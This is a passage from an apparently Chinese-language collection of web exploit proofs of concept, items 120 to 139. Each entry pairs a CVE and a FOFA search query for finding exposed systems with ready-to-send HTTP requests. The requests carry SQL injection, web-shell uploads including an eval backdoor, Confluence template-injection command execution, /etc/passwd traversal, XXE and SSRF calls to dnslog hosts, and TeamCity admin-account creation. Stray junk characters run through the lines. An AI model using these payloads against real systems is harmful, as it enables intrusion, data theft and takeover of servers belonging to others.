) B1 l+ m: u3 U5 h$ T/ K" Lsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
2 u1 G0 E8 ? l4 `: P- v B2 h$ v8 e7 {5 I7 N3 N- b. C
- B7 K# t0 ]: u) `! i, G5 y
120. 北京百绰智能S40管理平台导入web.php任意文件上传( o" G7 L. e3 |4 I* s
CVE-2024-1253
, u( f! H' f, e5 B5 pFOFA:title="Smart管理平台"# j+ U9 i) J& b2 h; [* x
POST /useratte/web.php? HTTP/1.17 B9 f& j$ f5 D8 `1 s P) D+ v
Host: ip:port- Q* _: N+ U4 _
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
7 d8 a1 \- X& B/ YUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko1 c+ Y+ l; Y1 |+ R% t! N) S6 K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# _- w5 M- }6 e$ w; U& E. Q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 o* ?4 o7 E8 P$ s& A3 R5 V
Accept-Encoding: gzip, deflate* \6 o H/ s: N8 N
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
0 J( V2 T0 _ e9 ^% u! `Content-Length: 597
$ N7 H7 I8 I* aOrigin: https://ip:port
& Q+ W. W/ `" D/ X& vReferer: https://ip:port/sysmanage/licence.php3 c/ g; d! ?: {3 D7 t
Upgrade-Insecure-Requests: 1
# p+ a2 d- w+ D! eSec-Fetch-Dest: document
1 U6 R+ P$ X% q3 V. N! G( QSec-Fetch-Mode: navigate( i2 _' A! `! u0 E2 ?: }
Sec-Fetch-Site: same-origin' v x$ r6 |. S0 {3 V" r
Sec-Fetch-User: ?17 r' X& X: i! E/ R
Te: trailers
8 Q) _! t% w" OConnection: close
$ C+ a$ \7 Y9 ]2 f1 p3 }8 C2 S- K* K9 f) O$ F! |
-----------------------------42328904123665875270630079328/ j( d1 M' f0 D3 @/ _' e j- H
Content-Disposition: form-data; name="file_upload"; filename="2.php"+ h$ N5 T- A7 O% u4 {
Content-Type: application/octet-stream1 O; S: U6 _. Z% e0 ?) Q- }
) R- f6 H1 s# F( z<?php phpinfo()?>
& K$ e5 }0 s# G R5 o-----------------------------42328904123665875270630079328& h: O* Z: s9 C% E4 y- f, N2 N
Content-Disposition: form-data; name="id_type": p- u& N% P# G& K' _
- A5 @( Y! e4 ]
1) q9 X, g: n) h+ D
-----------------------------42328904123665875270630079328/ C: M) \: ^1 F" N4 T. U4 P
Content-Disposition: form-data; name="1_ck"4 `* ^" x0 M6 Z9 }, r! |7 p
5 B0 ^' m2 L- V3 Y
1_radhttp
]$ A+ t; ~9 W3 D0 p-----------------------------42328904123665875270630079328) p" B# i, H. i! ?( A9 n6 v8 ~( m0 ^
Content-Disposition: form-data; name="mode"
2 b' [* Q* A, c
. P" m4 K8 C4 y3 {import
, n% U% P+ c8 J3 ^; ]-----------------------------42328904123665875270630079328
+ }) m0 ^( u3 `/ u! R- J" }
1 a9 [1 Z* a& m. S
; h* H# d9 p2 m c9 u文件路径/upload/2.php
. p. j% T a! {: \5 S
* s9 {$ {# H% L2 g& } f1 G$ i0 ~121. 北京百绰智能S42管理平台userattestation.php任意文件上传
: ~1 j4 \; L: qCVE-2024-1918
" U9 l1 o* l' _1 J4 S% N( Q0 ]! iFOFA:title="Smart管理平台"
5 h" g* }: L7 _POST /useratte/userattestation.php HTTP/1.1
. L( ?) W J U+ P# D- YHost: 192.168.40.130:8443
T' |8 P- V. O0 w% HCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50. m# k$ A8 |, `' P! ? c' c
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko5 ~. p2 _9 y3 T$ _; [ V' G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& H9 o: x4 m+ D9 a. } |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" y/ F/ P# H }0 o- j
Accept-Encoding: gzip, deflate
6 a0 p) q; H: ~3 E. R% PContent-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793286 x$ w- g9 d' s$ _- \2 d# K5 B( A
Content-Length: 592
+ r, v! l. \/ y1 x8 B! } V. dOrigin: https://192.168.40.130:8443; q* o" ]: u8 g
Upgrade-Insecure-Requests: 1* e" \+ W$ R# o B& G0 n, D+ i6 o
Sec-Fetch-Dest: document
- n- E& ^7 |4 K& xSec-Fetch-Mode: navigate6 o: l4 O, l/ }* ^6 U2 `4 b
Sec-Fetch-Site: same-origin
6 e4 Y( X' |7 \6 ?Sec-Fetch-User: ?1
3 M1 i5 Y& ~ h; S" f4 NTe: trailers. z7 V5 K" a" W7 r5 v ~% i2 s
Connection: close4 ?1 d. T6 n7 E
7 g6 ]) q) Y0 d' q1 b8 t" q
-----------------------------42328904123665875270630079328
, d, K& c: H4 A5 d/ ~Content-Disposition: form-data; name="web_img"; filename="1.php"4 N5 F3 h" f8 \ S( t* V
Content-Type: application/octet-stream7 A5 H q$ a8 x1 }: E3 L/ v* U
% u1 x# @9 ^& x- s. Y<?php phpinfo();?>
. e/ O6 P5 K& W9 D9 o-----------------------------42328904123665875270630079328' f7 J0 i) s8 G
Content-Disposition: form-data; name="id_type"
7 V$ h& M0 ]% b( Y* H0 h& {% C, ]" p+ b: \2 {
13 E ?) U( v P) Z! I+ o
-----------------------------42328904123665875270630079328
! B- t% \- K2 J6 E' d$ _Content-Disposition: form-data; name="1_ck"
8 {/ F" O \+ K4 I% \
# x" h0 `+ }, O b1_radhttp, Q% m5 H( [5 V6 x
-----------------------------42328904123665875270630079328! L" L' E6 b" o
Content-Disposition: form-data; name="hidwel"
# J. Y- b- M3 i5 T6 M0 i, m% {% i
0 `. w9 {% x; }: |* T) q% qset4 W6 @2 N1 ~9 i+ F4 ~7 C, Z
-----------------------------423289041236658752706300793283 |3 [& Q/ G# v7 F. }4 K/ s/ v. x+ T
& E1 @% ], f+ M5 t
% ^$ L* F' J- x: c3 ?' Lboot/web/upload/weblogo/1.php" o8 N) A' P) ^4 k5 D) n1 w
! k' {& n1 s4 I0 M3 L7 R/ \2 q/ g122. 北京百绰智能s200管理平台/importexport.php sql注入2 M/ v. g+ J8 x. }2 r/ C# Z
CVE-2024-27718FOFA:title="Smart管理平台"0 I9 P& X' g2 [: {
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()& T" A$ [; l, K
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1- R; T' J/ H. l0 K" e6 c3 H
Host: x.x.x.x
, ^+ M( s/ E1 x8 p" M: RCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
5 r! U' H$ @2 {, _( AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
/ W: f9 l( h8 u0 K" _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 n9 L$ e8 @. E1 X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 G5 T4 u* r M: m& L9 U; m. lAccept-Encoding: gzip, deflate, br0 ?3 J1 S K( L& p2 f
Upgrade-Insecure-Requests: 1" C2 |; [$ V, X& K
Sec-Fetch-Dest: document
4 [2 G) v& N9 R0 xSec-Fetch-Mode: navigate9 k# I6 c# P+ [
Sec-Fetch-Site: none
. B9 ^/ }9 \8 ^9 i* ?0 [8 WSec-Fetch-User: ?1
6 f" s; w2 Z e' ^ b5 uTe: trailers# z3 Y! S( j0 b
Connection: close* u+ G* Y+ f1 G" T& q; [
: i% Y! q: g. h( [# U- G8 x& e
+ ]6 L% u7 @8 X, k2 q" T4 K$ I
123. Atlassian Confluence 模板注入代码执行
1 w% a# f& L7 X" @% I8 lFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
4 ^; ?1 {1 m3 ?; ePOST /template/aui/text-inline.vm HTTP/1.1: n7 J2 E) D: B6 O0 l% E5 l( x
Host: localhost:8090
/ Y0 W. x0 X! qAccept-Encoding: gzip, deflate, br+ J p y9 V! v) q0 N
Accept: */*4 q3 N" {+ O2 @/ U
Accept-Language: en-US;q=0.9,en;q=0.8
; Y* n3 v- g6 ]5 ?3 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36 |! l9 {: B7 ?" u: ]; _6 r& h# ^
Connection: close
( F; o/ K) \: M5 {2 X$ GContent-Type: application/x-www-form-urlencoded2 F0 x% x/ n( E" f, p& P5 L' e* ~+ A
, d/ Y* V( I$ M+ r% X5 }, ?# xlabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
! W( F. _3 o7 M6 Q/ P1 M" V3 i8 t3 I- S. `" ]
. ^8 `* v9 A$ c7 z8 R) K124. 湖南建研工程质量检测系统任意文件上传% Z) ?9 b2 s& j
FOFA:body="/Content/Theme/Standard/webSite/login.css"' b1 ^, q |1 F& ?) ` x
POST /Scripts/admintool?type=updatefile HTTP/1.1: Q. o$ p% |0 J
Host: 192.168.40.130:8282
0 }. K+ |1 ?. j5 qUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
- K( n) ^+ J/ b k8 d1 ^Content-Length: 722 Z) F1 [& [' _. Z( n ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.83 L3 D5 _5 ]$ \$ \1 j' E
Accept-Encoding: gzip, deflate, br" |& [3 Y8 U' ]( B! p3 z k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. b3 N B+ ~( K+ X
Connection: close K" L, V; e: }
Content-Type: application/x-www-form-urlencoded+ q9 @9 Y/ V% j* a- a
& D) z" w9 k; DfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>7 S% p1 |+ {* A" W1 @
+ L; {/ ?& e+ B6 `8 S8 o
8 X/ O- }7 x( vhttp://192.168.40.130:8282/Scripts/abcgcg.aspx. c' h; \; d7 u/ p8 r& Q; D
" s* Q* q; O2 L2 x
125. ConnectWise ScreenConnect身份验证绕过
: X* s! {) M5 h/ ?CVE-2024-1709& N: x% ?# @5 _, a4 I
FOFA:icon_hash="-82958153"
9 |0 K+ H. F, t$ [& _. d, dhttps://github.com/watchtowrlabs ... bypass-add-user-poc
9 d/ k8 ^9 |* w0 c1 j6 j: P; u
6 c8 k: g3 a. X+ t- k$ R4 ?' N& Y0 ^% w1 ?7 P' L
使用方法# U& d% O" A% J" A4 ] @
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!. K- D2 d( J/ z9 X G& L" [/ V! L
8 h* a$ D" q6 D
% ~9 K3 x+ B8 B! E& q创建好用户后直接登录后台,可以执行系统命令。
" e. Y" R6 o( ?) m! F! c* {, C. a8 o8 z# {: n5 @8 K; n
126. Aiohttp 路径遍历
+ t( |: ~ R- w- U* f; L& a# ZFOFA:title=="ComfyUI"# l0 E$ h5 O' P! {3 Y0 R, S
GET /static/../../../../../etc/passwd HTTP/1.1
: y% U: h0 H+ f( i8 v2 xHost: x.x.x.x, Q5 b1 y2 u3 }- K% n' E; q4 l2 ]2 |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36. j: c& r$ B N' m
Connection: close
# ^, z/ Q d3 x; z0 ?, O' P, q- pAccept: */*
% p- r0 w! y. u( x7 `, ~, I' OAccept-Language: en
3 a* L1 x- a* r, a6 J, N( f8 ?Accept-Encoding: gzip
/ t4 O! `( W4 D( Q3 g
" x q0 n4 R' s/ C
" o. Q2 l% z. g* j4 F1 n127. 广联达Linkworks DataExchange.ashx XXE1 |6 R( o: z1 s
FOFA:body="Services/Identification/login.ashx"
' m- J7 U( k' I# l7 m! Y0 KPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
5 E( F: N0 |7 Z% o( aHost: 192.168.40.130:88882 f/ K9 @4 u: J& ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
0 R2 x! N( i0 S6 EContent-Length: 415
/ F+ A9 t. W8 Z- n) jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 ~- u; y$ Q9 WAccept-Encoding: gzip, deflate
8 f$ K! O0 W5 r0 y) RAccept-Language: zh-CN,zh;q=0.9; n. j4 H" o2 m. l
Connection: close& U9 }; V* j7 r0 ]9 O
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe06 l0 N: t0 f6 M. {( h) V
Purpose: prefetch+ n/ [- ^! i0 ?6 a; V8 {7 p+ `$ R, W# e
Sec-Purpose: prefetch;prerender% H* r& H+ ^; k" x) G! L
( M& ^! X& \0 {, c------WebKitFormBoundaryJGgV5l5ta05yAIe0& R* v8 t$ C' x
Content-Disposition: form-data;name="SystemName"
' _9 V3 a1 `, _) e6 c r+ Q' Y5 f) x6 f
BIM
% c' b. K) E% [2 K! O: d& c5 Y------WebKitFormBoundaryJGgV5l5ta05yAIe0
) J0 v# |1 Y9 y: K2 I; J; WContent-Disposition: form-data;name="Params"
! e- X; O; q7 U& p/ yContent-Type: text/plain
9 G$ E6 b6 b$ o, ?
& B" l* q& @& [' E: B<?xml version="1.0" encoding="UTF-8"?>1 o7 m. h: y7 R- \) n0 @. _
<!DOCTYPE test [
0 O1 T' a3 l% _2 `* n<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">: i' K+ j; m- P
] _" G; u& C$ a1 [; a
>$ Z; M7 d( i/ q0 T9 x: J! }, _
<test>&t;</test>
; ?/ \* E0 }" n: h8 H. |0 D------WebKitFormBoundaryJGgV5l5ta05yAIe0--5 \- d3 C# {9 `2 Q, L# @' H
' s# }( A" {" T) K6 w
. @5 p- C( D8 _! J* J
2 ^. P+ ^- L R3 P
128. Adobe ColdFusion 反序列化7 I3 c4 `' x- S* f: j. R6 {, Q
CVE-2023-38203: b; @ P" [3 c* v1 S( j
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
. E4 E3 O9 f8 C* d3 t5 xFOFA:app="Adobe-ColdFusion"
' u( Q }# }5 gPAYLOAD
7 u& Y3 r+ d6 [' C, {) i. d
9 F% }, P& d5 z4 d7 f# [* G129. Adobe ColdFusion 任意文件读取
# R$ I2 m# K1 j' }3 CCVE-2024-20767
) N) I+ ]' Q( _, i6 K" ZFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"6 T( {- K# X9 E m! [, w- L8 W4 J
第一步,获取uuid
: X) h" E g! T: E1 C9 G+ AGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1- M* @' r, G- @$ L# @% Q% S% W& |1 o- j
Host: x.x.x.x" t% ], f# { `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36& K( |$ b; {2 C' j9 H. l
Accept: */*" [2 c9 [: j5 b7 D+ v) w) N+ x+ K6 ]
Accept-Encoding: gzip, deflate
! x4 p+ ~8 i+ _. xConnection: close
2 G% _& N# P* z% x8 S4 S5 s: }. R" I6 E3 e
/ m4 U( E' \$ E+ ?, W& e" _, }第二步,读取/etc/passwd文件* s- J, U6 d, S
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1 s4 B) I: Q$ u3 `/ W: u. W
Host: x.x.x.x
% O% w2 Y4 Z5 z7 f ~, V* J& YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
7 E! T1 C) Z8 a5 N5 t; `9 U( _Accept: */*
' G! F' C* Q+ @+ VAccept-Encoding: gzip, deflate
* C8 a. V% K9 l) j2 xConnection: close5 |& ?9 B" K4 E, k
uuid: 85f60018-a654-4410-a783-f81cbd5000b98 F, K; g4 R& K+ F. e* q ?
9 n- d0 G+ l" a' U* P( T2 I
+ m/ L& D3 V: _+ F+ f6 X+ b130. Laykefu客服系统任意文件上传
: P3 l1 O1 n K$ [/ @6 aFOFA:icon_hash="-334624619"
U3 Q4 p8 W8 n- R* APOST /admin/users/upavatar.html HTTP/1.1
2 V5 @* z; J0 S& O, gHost: 127.0.0.1
* t6 |/ K; g. yAccept: application/json, text/javascript, */*; q=0.01" U# Q& [1 L, O6 M% s6 w" ^
X-Requested-With: XMLHttpRequest
5 J1 N0 g8 @$ w- I8 v+ E6 HUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26! u$ e" d9 {: `8 h
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR- G( ]: j( d: V7 I
Accept-Encoding: gzip, deflate
, F0 y; T. A8 j v! ?$ f0 dAccept-Language: zh-CN,zh;q=0.9* u$ A0 d+ b0 G9 p
Cookie: user_name=1; user_id=3
/ a X& e9 v( v( D: a3 J bConnection: close2 ?5 x+ W1 e. B9 y# Q" I/ b2 T( |3 N
, ?' A' k$ [' U3 @3 t% o5 q------WebKitFormBoundary3OCVBiwBVsNuB2kR
C3 H) u( ?/ |4 _* xContent-Disposition: form-data; name="file"; filename="1.php". @* A( d5 r' p6 m! P
Content-Type: image/png/ [- @- n& b9 T/ _- C- t) k6 [
: G- l( o$ r. T: Q0 G5 N
<?php phpinfo();@eval($_POST['sec']);?>: w3 T$ ], U8 Z
------WebKitFormBoundary3OCVBiwBVsNuB2kR--/ O% J! S( F" r% q2 G9 s
% C+ C. N8 y7 ^% x3 {6 s3 Y$ P& z' j. q1 q7 `' ^
131. Mini-Tmall <=20231017 SQL注入( B" _8 {3 ^( o1 l) Q2 Z. H4 k
FOFA:icon_hash="-2087517259"
. g8 E9 C1 p6 Q0 @$ d后台地址:http://localhost:8080/tmall/admin
/ P3 J( A2 F: \- D# u. I- Rhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)3 p* w! R& B5 [' I f1 Z6 d5 ?# G# i1 A
7 v9 `+ `0 [1 U2 U# q
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
W) q% W* Q& e$ R) UCVE-2024-27198! m- n7 N' T. M
FOFA:body="Log in to TeamCity"
0 M0 {: \+ j* Z2 h7 ]5 j" wPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1# E$ p' j9 u4 k( U6 L0 K
Host: 192.168.40.130:8111' D- E- S# ~! b5 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
& M7 j: L& y, V- K N" CAccept: */*
; e( }$ u* r1 S YContent-Type: application/json2 j) U, I, L S5 K" t. Z& H
Accept-Encoding: gzip, deflate5 x" R7 w( T: v9 U1 X
' b) L5 L- n" M# z' b h' K{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
3 b/ g! G- Q& m6 t8 m- W; q3 \1 R7 V, [* e
+ s. S# }0 h0 h& S6 P2 JCVE-2024-27199" v& f/ G1 f. I6 W; @7 p: c
/res/../admin/diagnostic.jsp& l" v/ b2 x, ^& |9 b
/.well-known/acme-challenge/../../admin/diagnostic.jsp
" T2 K! N% M8 V3 c r/update/../admin/diagnostic.jsp
! J4 H8 w7 D* H" y% ~/ n4 @ W" B1 ?6 Q0 J5 |
, Y: M5 ^2 W/ k* `7 \
CVE-2024-27198-RCE.py
& B+ i+ ]6 M e i+ U) V+ Z) K! k* q$ m2 l0 L9 v
133. H5 云商城 file.php 文件上传0 K( K. |" ?! |: D1 L3 X# v
FOFA:body="/public/qbsp.php"* E; [' T9 Z/ c9 s4 b) W4 A3 r/ g
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1" C( s# E+ Y) b+ z5 o' @7 A6 @
Host: your-ip: k7 |! a# a) O9 [2 W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
s! O# q' h5 Q/ i' x, }Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx' D- z3 E' i' O
- q4 w: B8 N( x7 z, g5 n
------WebKitFormBoundaryFQqYtrIWb8iBxUCx* f5 O$ f4 x9 J# P, @* ^1 r
Content-Disposition: form-data; name="file"; filename="rce.php"( j% R/ S0 p3 w) H! z
Content-Type: application/octet-stream2 R4 G$ ^( ~9 R, ?. k
5 s _, R; L |* y9 S# c<?php system("cat /etc/passwd");unlink(__FILE__);?>
7 U- {" R; C" w0 v( Q------WebKitFormBoundaryFQqYtrIWb8iBxUCx--5 h$ k( l; c) X* x$ Z
% Y' s2 Q3 m& |5 s O. E& J; q7 P& \
+ H9 t) A h6 M( S
$ } P, y ^7 w) z7 j5 H134. 网康NS-ASG应用安全网关index.php sql注入) \9 K' K. S" `7 N$ c4 B- u
CVE-2024-2330- r* m8 Y& ]' c U2 F
Netentsec NS-ASG Application Security Gateway 6.3版本
, S! ?/ I f! xFOFA:app="网康科技-NS-ASG安全网关"& |! h" g9 e& u" |, ?; l6 q1 \7 q7 a
POST /protocol/index.php HTTP/1.1: \' V8 s: |4 v& h9 r) t
Host: x.x.x.x
9 y* d& L1 T7 v5 R" XCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
K8 E# ^5 y6 b( kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
# |2 |: ]" o. k) e6 IAccept: */*
[, A4 ` i! l7 pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( s) A/ \7 R& h3 [1 W# R- W: s
Accept-Encoding: gzip, deflate% \$ |- P. Q0 Y
Sec-Fetch-Dest: empty
& W$ z; C( J" S7 ^: J6 d$ KSec-Fetch-Mode: cors. [& a! z/ u# a
Sec-Fetch-Site: same-origin
) ^ S o! [( c5 eTe: trailers7 ? m! k2 ]& L& j
Connection: close
* ~: c; G+ E6 ^2 j# LContent-Type: application/x-www-form-urlencoded
8 l0 [% k+ {: DContent-Length: 263
% J5 ?% \8 @0 g2 j( Q+ h: N) s; C) u6 j8 f9 v) O2 b" ?( f
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}! N$ M# y$ a- o' z) i
0 t: H- F; d9 X% O( V
" [, O: j! I. V& j$ [
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
; e0 J% a5 E9 e+ wCVE-2024-2022
, x/ r0 L4 i: J YNetentsec NS-ASG Application Security Gateway 6.3版本
& d2 o& Z7 }" i& ?5 lFOFA:app="网康科技-NS-ASG安全网关"
3 S* x4 X% [9 {* D! w: GGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1- V3 b% U( l5 ~- t1 W
Host: x.x.x.x6 G, W. R; F3 A- [4 I+ k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.365 t$ X% f- ?) m8 j, u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: n* R1 ]5 Y, ?# L" s1 ?4 p7 N# _Accept-Encoding: gzip, deflate! ~" I: r( F* q
Accept-Language: zh-CN,zh;q=0.9. b% F. g( O& i& N: {/ q8 m
Connection: close! j0 r* Y) G% l
5 g E+ M6 E% i" D
; L; L( {9 Z4 x' o- L
136. NextChat cors SSRF: B! x- b" C2 b$ b9 X
CVE-2023-49785. O" b: R3 ?6 J
FOFA:title="NextChat"; W1 `% e! G( U" V) G: I
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1: P5 A# W- e" O
Host: x.x.x.x:10000) ~! Y- u4 |- n" \: x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36: W- F; x9 ]. u, n R
Connection: close2 x$ I6 w, D5 d2 O
Accept: */*
! p+ R* h7 f, Q" i; VAccept-Language: en
1 q, }3 O# f" h( TAccept-Encoding: gzip" B9 e* ^7 ]3 G/ I3 h! I
, I1 C7 C" v4 p4 r' [9 U
6 z. `$ J; y8 Z2 c1 X$ x137. 福建科立迅通信指挥调度平台down_file.php sql注入
+ {4 E; Z0 a7 Y3 g% ICVE-2024-2620
* k$ v" c2 |) s" k3 dFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"3 T& V, M- A! k8 a1 N0 [
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1+ ~, I4 p- }7 ]
Host: x.x.x.x9 q. y* r |; V6 y$ B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0. P$ [: e5 V/ l: d. X( ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 H+ y G$ b5 z) o: TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 f6 R+ \7 j8 N# i
Accept-Encoding: gzip, deflate, br2 Y m" u# |+ i% ]" K; c2 ^
Connection: close! @9 M. ]; P1 s5 F9 ?* d2 K( O+ e
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj8 d6 E/ g! p; G5 k/ c$ E* Y s
Upgrade-Insecure-Requests: 1/ e3 Q, U2 E9 O4 X' Q$ a) P7 ?
" t' W" v M9 m. ?" j9 B7 y/ o! s; X- L- \& _! h
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入0 [$ r1 t( }7 B) [$ R
CVE-2024-26214 B' I( ~) i/ \. j/ L4 L
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"6 S$ d; P7 ~: f% b
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
) h$ R0 O. q% g6 r0 v5 I% UHost: x.x.x.x
; o% G4 _, A/ b l% JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
^! ? T" a6 ?9 gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' B# `" _7 x& g. LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 D1 t& j! t) T5 w
Accept-Encoding: gzip, deflate, br4 [' [4 x4 ~; H0 [/ e
Connection: close
) y: f. U" j3 |Upgrade-Insecure-Requests: 1& J: \# H# q9 q" R0 E" X, C# h
5 w- L s ?4 M1 X$ A
. f7 t4 E8 q) R( @& Y2 T
139. 福建科立讯通信指挥调度平台editemedia.php sql注入8 q/ ]6 ?1 H1 S3 f3 | a. v
CVE-2024-2622" G$ K1 o! n& t; [& C" S
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"4 b5 g( z F# ~7 B n- @
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.12 J' R) H$ W- Q$ J5 j/ ? q
Host: x.x.x.x4 Q! w# x" Q: X9 ^( Q* e/ g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
+ D+ Q# @/ R3 |0 T+ a. KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
